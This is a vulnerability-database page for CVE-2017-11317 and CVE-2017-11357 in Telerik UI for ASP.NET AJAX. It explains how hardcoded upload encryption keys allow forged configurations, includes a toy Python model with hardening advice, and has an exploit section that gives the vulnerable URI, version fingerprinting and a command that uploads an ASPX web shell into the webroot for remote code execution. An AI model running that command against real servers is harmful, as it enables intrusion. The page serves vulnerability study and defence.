POC details: 008244722306c4cdf000060dac3ba53b00beeb8b

Source
Related vulnerability
Title: Progress Telerik UI for ASP.NET AJAX cryptographic issue vulnerability (CVE-2017-11317)
Description: ASP.NET AJAX is a set of controls for ASP.NET. Progress Telerik UI is a UI (user interface) suite of ASP.NET controls for AJAX developed by the US company Telerik. Telerik.Web.UI in Progress Telerik UI for ASP.NET AJAX before R1 2017, and R2 releases before R2 2017 SP2, contains a security vulnerability caused by the use of weak RadAsyncUpload encryption. A remote attacker can exploit this vulnerability to upload arbitrary files or execute arbitrary code.
Introduction
# CVE-2017-11317-and-CVE-2017-11357-in-Telerik

# Description

These two CVEs are in the file-upload module (RadAsyncUpload).

Versions of Telerik UI for ASP.NET AJAX before R1 2017, and R2 releases before R2 2017 SP2, ship with a pair of hardcoded encryption keys:

![hardcoded Key](image.png)

If developers do not configure custom keys, these default keys are used to encrypt and decrypt the upload configuration that the client sends with every request, so anyone who knows the defaults can forge that configuration.

The default encryption key opens two attack surfaces in the module:

+ ``CVE-2017-11317``: allows an attacker to choose the destination folder of the uploaded file
+ ``CVE-2017-11357``: allows an attacker to upload a file of an unsafe type onto the target

Chaining the two gives an attack path that ends in RCE on the target server.
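The following is an added example, not code from the original README or from ``bao7uo/RAU_crypto``, and it does not reproduce Telerik's real token format, cipher or key derivation. It models the shape of the weakness only: an upload handler that decrypts a client-supplied configuration (destination folder and allowed extensions) under a key, and what changes when that key is a library-wide hardcoded default versus a per-deployment secret. The key value, folder names and field names (``DEFAULT_KEY``, ``TargetFolder``, ``AllowedFileExtensions``) are hypothetical, and the cipher is a stdlib-only HMAC-SHA256 counter-mode PRF with an encrypt-then-MAC tag, chosen so the example runs offline.

```python
# Added example (not the original README's or RAU_crypto's code): a toy model of
# an upload handler whose per-request configuration is encrypted client-side and
# decrypted server-side. Hypothetical names/values; not Telerik's real scheme.
import base64
import hashlib
import hmac
import json
import os

# Hypothetical vendor default, shipped inside the library and therefore identical
# on every install whose developers never set their own key (the modelled root cause).
DEFAULT_KEY = b"vendor-default-upload-key-0000000000"


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """HMAC-SHA256 in counter mode, used as a PRF keystream (stdlib only)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def encrypt_config(key: bytes, config: dict) -> str:
    """Encrypt-then-MAC a JSON upload configuration; returns a base64 token."""
    enc_key = hashlib.sha256(b"enc" + key).digest()
    mac_key = hashlib.sha256(b"mac" + key).digest()
    nonce = os.urandom(16)
    plaintext = json.dumps(config, sort_keys=True).encode()
    ciphertext = bytes(p ^ k for p, k in zip(plaintext, _keystream(enc_key, nonce, len(plaintext))))
    tag = hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()
    return base64.b64encode(nonce + ciphertext + tag).decode()


def decrypt_config(key: bytes, token: str) -> dict:
    """Verify the tag first, then decrypt. Raises ValueError on a forged or tampered token."""
    raw = base64.b64decode(token)
    nonce, ciphertext, tag = raw[:16], raw[16:-32], raw[-32:]
    enc_key = hashlib.sha256(b"enc" + key).digest()
    mac_key = hashlib.sha256(b"mac" + key).digest()
    expected = hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("upload configuration failed authentication")
    plaintext = bytes(c ^ k for c, k in zip(ciphertext, _keystream(enc_key, nonce, len(ciphertext))))
    return json.loads(plaintext)


def handle_upload(server_key: bytes, token: str, filename: str) -> str:
    """Server side: trusts the folder and extension policy carried by the decrypted token.
    Returns the path the file would be written to, or a rejection string."""
    try:
        cfg = decrypt_config(server_key, token)
    except ValueError:
        return "rejected: bad token"
    ext = os.path.splitext(filename)[1].lower()
    if ext not in cfg["AllowedFileExtensions"]:
        return "rejected: extension not allowed"
    return cfg["TargetFolder"].rstrip("/") + "/" + filename


def attacker_token(key_guess: bytes) -> str:
    """Attacker forges a configuration that points at the webroot (CVE-2017-11317 shape)
    and whitelists .aspx (CVE-2017-11357 shape), under the key they believe the server uses."""
    forged = {"TargetFolder": "/inetpub/wwwroot/Temps", "AllowedFileExtensions": [".aspx"]}
    return encrypt_config(key_guess, forged)


def demo() -> dict:
    forged = attacker_token(DEFAULT_KEY)
    # Deployment 1: developers never set a key, so the library default is in use.
    unpatched = handle_upload(DEFAULT_KEY, forged, "sh3ll.aspx")
    # Deployment 2: a per-install random key; the attacker's forgery fails the MAC.
    custom_key = os.urandom(32)
    hardened = handle_upload(custom_key, forged, "sh3ll.aspx")
    # A legitimate token issued under the custom key still works.
    legit_cfg = {"TargetFolder": "/uploads", "AllowedFileExtensions": [".png"]}
    legit = handle_upload(custom_key, encrypt_config(custom_key, legit_cfg), "photo.png")
    return {"unpatched": unpatched, "hardened": hardened, "legit": legit}


if __name__ == "__main__":
    print(demo())
```

With the default key the forged token decrypts and the handler happily writes ``sh3ll.aspx`` under the webroot; with a deployment-specific key the same token is rejected before any field of it is trusted. Note that a unique, authenticated key only closes the forgery path: a handler that still takes ``TargetFolder`` and ``AllowedFileExtensions`` from the client is one key leak away from the same outcome, so the server should enforce its own folder and extension policy regardless of what the token says.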

# Exploit

The script used here is from ``bao7uo/RAU_crypto``.

The Python script exposes functions that can be called individually for testing, or used together to upload a file to the target server automatically.

The URI to exploit is ``/Telerik.Web.UI.WebResource.axd?type=rau``

If a request to this URI returns the following response message:

![alt text](images/image-1.png)

there is a high probability that this pair of CVEs is exploitable.

The next step is determining the exact Telerik version on the target, since the script must be given the version that matches the server.

The version appears in a comment block, with no string in front of it, like this:

![alt text](image.png)

Use the script's ``-P`` option to upload the ASPX shell automatically into a known folder inside the webroot.

The command:

```
python3 CVE-2017-11317.py -P "Temps\\" <version> sh3ll.aspx http://<target>/Telerik.Web.UI.WebResource.axd?type=rau 127.0.0.1:8080
```

![alt text](images/image-3.png)

If it succeeds, we have RCE.

![alt text](images/image-4.png)
File snapshot
 [4.0K]  /data/pocs/008244722306c4cdf000060dac3ba53b00beeb8b
├── [4.0K]  images
│   ├── [ 12K]  image-1.png
│   ├── [ 57K]  image-2.png
│   ├── [197K]  image-3.png
│   ├── [ 15K]  image-4.png
│   └── [ 45K]  image.png
├── [1.6K]  README.md
├── [  12]  requirements.txt
├── [ 15K]  script.py
├── [1.5K]  sh3ll.aspx
└── [   3]  test.txt

1 directory, 10 files